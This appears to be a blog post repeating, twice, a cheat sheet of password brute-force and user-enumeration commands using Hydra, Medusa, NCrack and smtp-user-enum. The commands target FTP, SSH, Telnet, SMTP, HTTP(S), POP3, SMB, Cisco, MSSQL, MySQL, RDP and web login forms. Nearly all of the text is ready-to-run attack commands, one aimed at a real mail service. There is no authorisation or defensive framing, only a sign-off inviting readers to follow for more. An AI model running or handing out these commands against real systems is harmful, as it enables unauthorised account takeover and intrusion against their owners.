Requirements:-
- Wordlist (https://github.com/danielmiessler/SecLists)
- Username(or userlist /usr/share/wordlist)
- Kali Linux or Termux (Google For Termux For Tools Installation!)
- Working Internet
FTP Bruteforce 📁
1️⃣ Hydra 🐍
$ hydra -l superuser -P pwd.txt -v -f -e ns -t 5 -w 20 <ip> ftp >> brute_ftp.out
$ hydra -t 5 -V -f -l root -P common.txt ftp://<ip> >> brute_ftp.out
$ hydra -v -f -l ftp -P fpass.lst -t 10 ftp://<ip> >> brute_ftp.out
$ hydra -l root -P 500-worst-passwords.txt <ip> ftp
For the parameters please type hydra -h !
2️⃣ Medusa 🗿
$ medusa -u test -P 500-worst-passwords.txt -h <ip> -M ftp
$ medusa -M ftp -h <ip> -u username -p password
SSH 📡
1️⃣ Medusa 🗿
$ medusa -h <target> -P /root/pasword.txt -u root -M ssh
2️⃣ NCrack 🦀
$ ncrack -p ssh -u root --pass 'root'
<target>
3️⃣ Hydra 🐍
$ hydra -t 5 -V -f -l root -P common.txt localhost ssh >> brute_ssh.out
$ hydra -v -l root -P 500-worst-passwords.txt <target> ssh >> brute_ssh.out
$ hydra -v -l root -P fpass.lst -t 5 ssh://ip -o brute_ssh.out
Telnet 📞
1️⃣ Hydra 🐍
$ hydra -v -l root -P fpass.lst -t 5 telnet://<ip> >> brute_telnet.out
$ hydra -l username -P wordlist -t 4 -s 23 -e ns -f -v <ip> telnet >> brute_telnet.out
2️⃣ Medusa 🗿
$ medusa -h <ip> -M telnet -U user.txt -P password.txt
SMTP 📧
1️⃣ Medusa 🗿
$ medusa -M smtp -m AUTH:NTLM -U accounts.txt -p password
$ medusa -M smtp -m EHLO:world -U accounts.txt -p password
SMTP VRFY 📧
1️⃣ Medusa 🗿
$ medusa -M smtp-vrfy -m VERB:VRFY -U accounts.txt -p domain.com
2️⃣ Smtp-User-Enum 🔩
$ smtp-user-enum -M VRFY -U /home/weak_wordlist/userall.txt -t <ip>
SMTP RCPT TO 📧
1️⃣ Medusa 🗿
medusa -M smtp-vrfy -m VERB:RCPT TO -U accounts.txt -p domain.com
HTTP 🔓
1️⃣ Hydra 🐍
$ hydra -m /tip/ -L Userid.txt -p 12345678 -e s -V -f <ip> http-get
HTTPS 🔐
1️⃣ Hydra 🐍
$ hydra -m /tip/ -L Userid.txt -P List.txt -e s -V -f <ip> https-get
POP3 📥
1️⃣ Medusa 🗿
$ medusa -M pop3 -m MODE:AS400 -U accounts.txt -p password
$ medusa -M pop3 -m DOMAIN:<url> -U accounts.txt -p password
2️⃣ Hydra 🐍
$ hydra -l muts -P pass.txt my.pop3.mail pop3 >> brute_pop3.out
$ hydra -S -l <youremail@domain> -P password.lst pop3.live.com -s 995 pop3 >> brute_pop3.out
SMB 📡
1️⃣ Hydra 🐍
$ hydra -v -l Administrator -P fpass.lst smb://<ip> >> brute_smb.out
$ hydra -L user.txt -P pass.txt -e ns -f -v -V -w5 <ip> smb >> brute_smb.out
2️⃣ Medusa 🗿
$ medusa -h <ip> -u administrator -P passwords.txt -e ns -M smbnt >> brute_smb.out
Cisco 🖲
1️⃣ Hydra 🐍
$ hydra -f -v -P pass.txt <ip> cisco >> brute_cisco.out
$ hydra -m cloud -P pass.txt <ip> cisco-enable >> brute_cisco.out
MSSQL 🧱
1️⃣ Hydra 🐍
$ hydra -v -l sa -P fpass.lst -t 4 <ip> mssql -o brute_mssql.out
$ hydra -t 5 -V -f -l sa -P "C:\pass.txt" <ip> mssql
$ hydra mssql://<ip>:1433 -l sa -P /root/Desktop/parolalar
MySQL 📅
1️⃣ Hydra 🐍
$ hydra -t 5 -V -f -l root -e ns -P common.txt localhost mysql
$ hydra -v -l root -P fpass.lst -t 1 mysql://ip -o brute_mysql.out
RDP 🔮
1️⃣ Hydra 🐍
$ hydra -v -f -l administrator -P common.txt rdp://<ip> // not good
2️⃣ Medusa 🗿
$ medusa -u administrator -P /usr/share/john/password.lst -h 10.10.10.71 -M rdp
3️⃣ NCrack 🦀
$ ncrack -p rdp -u administrator --pass 'password' -iL in2
$ ncrack -vv --user offsec -P password-file.txt rdp://<ip>
WebForm 🕸
1️⃣ Hydra 🐍
$ hydra -t 4 -l admin -V -P common.txt <ip> http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"
$ hydra -t 4 -l admin -V -P common.txt <ip> http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"
Enjoy! Follow us for more...
- Wordlist (https://github.com/danielmiessler/SecLists)
- Username(or userlist /usr/share/wordlist)
- Kali Linux or Termux (Google For Termux For Tools Installation!)
- Working Internet
FTP Bruteforce 📁
1️⃣ Hydra 🐍
$ hydra -l superuser -P pwd.txt -v -f -e ns -t 5 -w 20 <ip> ftp >> brute_ftp.out
$ hydra -t 5 -V -f -l root -P common.txt ftp://<ip> >> brute_ftp.out
$ hydra -v -f -l ftp -P fpass.lst -t 10 ftp://<ip> >> brute_ftp.out
$ hydra -l root -P 500-worst-passwords.txt <ip> ftp
For the parameters please type hydra -h !
2️⃣ Medusa 🗿
$ medusa -u test -P 500-worst-passwords.txt -h <ip> -M ftp
$ medusa -M ftp -h <ip> -u username -p password
SSH 📡
1️⃣ Medusa 🗿
$ medusa -h <target> -P /root/pasword.txt -u root -M ssh
2️⃣ NCrack 🦀
$ ncrack -p ssh -u root --pass 'root'
<target>
3️⃣ Hydra 🐍
$ hydra -t 5 -V -f -l root -P common.txt localhost ssh >> brute_ssh.out
$ hydra -v -l root -P 500-worst-passwords.txt <target> ssh >> brute_ssh.out
$ hydra -v -l root -P fpass.lst -t 5 ssh://ip -o brute_ssh.out
Telnet 📞
1️⃣ Hydra 🐍
$ hydra -v -l root -P fpass.lst -t 5 telnet://<ip> >> brute_telnet.out
$ hydra -l username -P wordlist -t 4 -s 23 -e ns -f -v <ip> telnet >> brute_telnet.out
2️⃣ Medusa 🗿
$ medusa -h <ip> -M telnet -U user.txt -P password.txt
SMTP 📧
1️⃣ Medusa 🗿
$ medusa -M smtp -m AUTH:NTLM -U accounts.txt -p password
$ medusa -M smtp -m EHLO:world -U accounts.txt -p password
SMTP VRFY 📧
1️⃣ Medusa 🗿
$ medusa -M smtp-vrfy -m VERB:VRFY -U accounts.txt -p domain.com
2️⃣ Smtp-User-Enum 🔩
$ smtp-user-enum -M VRFY -U /home/weak_wordlist/userall.txt -t <ip>
SMTP RCPT TO 📧
1️⃣ Medusa 🗿
medusa -M smtp-vrfy -m VERB:RCPT TO -U accounts.txt -p domain.com
HTTP 🔓
1️⃣ Hydra 🐍
$ hydra -m /tip/ -L Userid.txt -p 12345678 -e s -V -f <ip> http-get
HTTPS 🔐
1️⃣ Hydra 🐍
$ hydra -m /tip/ -L Userid.txt -P List.txt -e s -V -f <ip> https-get
POP3 📥
1️⃣ Medusa 🗿
$ medusa -M pop3 -m MODE:AS400 -U accounts.txt -p password
$ medusa -M pop3 -m DOMAIN:<url> -U accounts.txt -p password
2️⃣ Hydra 🐍
$ hydra -l muts -P pass.txt my.pop3.mail pop3 >> brute_pop3.out
$ hydra -S -l <youremail@domain> -P password.lst pop3.live.com -s 995 pop3 >> brute_pop3.out
SMB 📡
1️⃣ Hydra 🐍
$ hydra -v -l Administrator -P fpass.lst smb://<ip> >> brute_smb.out
$ hydra -L user.txt -P pass.txt -e ns -f -v -V -w5 <ip> smb >> brute_smb.out
2️⃣ Medusa 🗿
$ medusa -h <ip> -u administrator -P passwords.txt -e ns -M smbnt >> brute_smb.out
Cisco 🖲
1️⃣ Hydra 🐍
$ hydra -f -v -P pass.txt <ip> cisco >> brute_cisco.out
$ hydra -m cloud -P pass.txt <ip> cisco-enable >> brute_cisco.out
MSSQL 🧱
1️⃣ Hydra 🐍
$ hydra -v -l sa -P fpass.lst -t 4 <ip> mssql -o brute_mssql.out
$ hydra -t 5 -V -f -l sa -P "C:\pass.txt" <ip> mssql
$ hydra mssql://<ip>:1433 -l sa -P /root/Desktop/parolalar
MySQL 📅
1️⃣ Hydra 🐍
$ hydra -t 5 -V -f -l root -e ns -P common.txt localhost mysql
$ hydra -v -l root -P fpass.lst -t 1 mysql://ip -o brute_mysql.out
RDP 🔮
1️⃣ Hydra 🐍
$ hydra -v -f -l administrator -P common.txt rdp://<ip> // not good
2️⃣ Medusa 🗿
$ medusa -u administrator -P /usr/share/john/password.lst -h 10.10.10.71 -M rdp
3️⃣ NCrack 🦀
$ ncrack -p rdp -u administrator --pass 'password' -iL in2
$ ncrack -vv --user offsec -P password-file.txt rdp://<ip>
WebForm 🕸
1️⃣ Hydra 🐍
$ hydra -t 4 -l admin -V -P common.txt <ip> http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"
$ hydra -t 4 -l admin -V -P common.txt <ip> http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"
@𝑇𝘩𝑒𝑀𝑎𝑠𝑡𝑒𝑟𝐶𝐻) ⚠️
Enjoy! Follow us for more...
No comments:
Post a Comment